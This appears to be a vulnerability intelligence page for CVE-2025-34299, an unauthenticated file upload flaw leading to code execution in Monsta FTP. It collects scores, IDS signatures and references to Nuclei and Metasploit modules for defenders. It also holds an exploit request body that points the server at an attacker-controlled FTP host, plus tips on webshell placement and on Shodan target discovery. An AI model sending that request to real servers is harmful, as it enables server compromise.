CVE-2025-34299
published 2025-11-07CVE-2025-34299: Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute…
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
72.54%
99.4th percentile
Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute arbitrary code by uploading a specially crafted file from a malicious (S)FTP server.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| monsta_limited_of_new_zealand | monsta_ftp | <= 2.11 | — |
| monstaftp | monsta_ftp | <= 2.11 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandrequest={"connectionType":"ftp","configuration":{"host":"<attacker>","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}
otheractionName: downloadFile
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/mftp/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|downloadFile|22|"; fast_pattern; content:"|22|remotePath|22 3a 22 2f|"; content:"|22|localpath|22 3a 22 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2025-32499; reference:cve,2025-34299; classtype:attempted-admin; sid:2065695; rev:1; metadata:affected_product Monsta_FTP, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_07, cve CVE_2025_34299, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|fetchRemoteFile|22|"; fast_pattern; content:"|22|source|22 3a 22|http|3a 2f 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2022-31827; classtype:web-application-attack; sid:2065694; rev:1;)
bytes
|22|actionName|22 3a 22|downloadFile|22|
bytes
|22|remotePath|22 3a 22 2f|
bytes
|22|localpath|22 3a 22 2f|
- →Exploit traffic targets POST /mftp/application/api/api.php with a JSON body containing actionName=downloadFile, remotePath, and localPath fields — all unauthenticated. ↗
- →The attacker supplies an attacker-controlled FTP/SFTP host in the 'host' field of the JSON configuration, causing the server to connect outbound to the malicious server and download a file to an arbitrary localPath.
- →Detect Monsta FTP instances via Shodan/FOFA using the page title 'Monsta FTP' for asset discovery before exploitation.
- →Version fingerprinting: extract version from the JS filename pattern monsta-min-<version>.js in the page body; versions <= 2.11.2 are vulnerable.
- →OOB/OAST detection: the exploit causes an outbound DNS/FTP connection from the victim server to the attacker's host; monitor for unexpected outbound FTP (port 21) connections from web server processes.
- →The localPath parameter in the downloadFile request can be set to web-accessible directories, enabling webshell placement; monitor for new PHP/script files created in web root after POST requests to api.php.
- ·The Nuclei template targets both /mftp/ and / as base paths with stop-at-first-match, meaning the api.php endpoint may be at /mftp/application/api/api.php or /application/api/api.php depending on installation.
- ·The Metasploit module uses FTP (not SFTP) to exploit the vulnerability, though the vulnerability also supports SFTP as the connectionType.
- ·The ET Snort rule for CVE-2025-34299 (sid:2065695) references both CVE-2025-32499 and CVE-2025-34299, suggesting overlap or related CVEs for the same endpoint.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-42m5-3r2p-wr92: Monsta FTP versions 2
ghsa_unreviewed·2025-11-07
CVE-2025-34299 [CRITICAL] CWE-434 GHSA-42m5-3r2p-wr92: Monsta FTP versions 2
Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute arbitrary code by uploading a specially crafted file from a malicious (S)FTP server.
VulnCheck
monstaftp monsta_ftp Unrestricted Upload of File with Dangerous Type
vulncheck·2025·CVSS 9.3
CVE-2025-34299 [CRITICAL] monstaftp monsta_ftp Unrestricted Upload of File with Dangerous Type
monstaftp monsta_ftp Unrestricted Upload of File with Dangerous Type
Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute arbitrary code by uploading a specially crafted file from a malicious (S)FTP server.
Affected: monstaftp monsta_ftp
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-34299
Exploit PoC: https://vulncheck.com/xdb/bee3418c74a0; https://vulncheck.com/xdb/3e3b6329e753; https://vulncheck.com/xdb/945d96870d3f
Suricata
ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)
suricata·2025-11-07·CVSS 9.1
CVE-2022-31827 [CRITICAL] ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)
ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|fetchRemoteFile|22|"; fast_pattern; content:"|22|source|22 3a 22|http|3a 2f 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2022-31827; classtype:web-application-attack; sid:2065694; rev:1; metadata:affected_product Monsta_FTP, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_07, cve CVE_2022_31827, deploymen
Suricata
ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)
suricata·2025-11-07·CVSS 9.3
CVE-2025-32499 [CRITICAL] ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)
ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/mftp/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|downloadFile|22|"; fast_pattern; content:"|22|remotePath|22 3a 22 2f|"; content:"|22|localpath|22 3a 22 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2025-32499; reference:cve,2025-34299; classtype:attempted-admin; sid:2065695; rev:1; metadata:affected_product Monsta_FTP, attack_target Networking_Equipment, tls_state plaintext, created_at 2
Nuclei
Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
nuclei·CVSS 9.3
CVE-2025-34299 [CRITICAL] Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
Monsta FTP = 2.11 contains an unrestricted file upload vulnerability caused by lack of authentication on file uploads, letting unauthenticated attackers execute arbitrary code by uploading crafted files.
Template:
id: CVE-2025-34299
info:
name: Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
author: KrE80r
severity: critical
description: |
Monsta FTP = 2.11 contains an unrestricted file upload vulnerability caused by lack of authentication on file uploads, letting unauthenticated attackers execute arbitrary code by uploading crafted files.
impact: |
Unauthenticated attackers can upload malicious files to execute arbitrary code, potentially compromising the server.
remediation: |
Update to the latest version beyon
Metasploit
Monsta FTP downloadFile Remote Code Execution
metasploit
Monsta FTP downloadFile Remote Code Execution
Monsta FTP downloadFile Remote Code Execution
This module exploits a pre-authenticated remote code execution vulnerability in Monsta FTP versions < 2.11.3. The vulnerability exists in the downloadFile action which allows an attacker to connect to a malicious FTP or SFTP server and download arbitrary files to arbitrary locations on the Monsta FTP server. This module uses FTP to exploit the vulnerability.
2025-11-07
Published
Exploited in the wild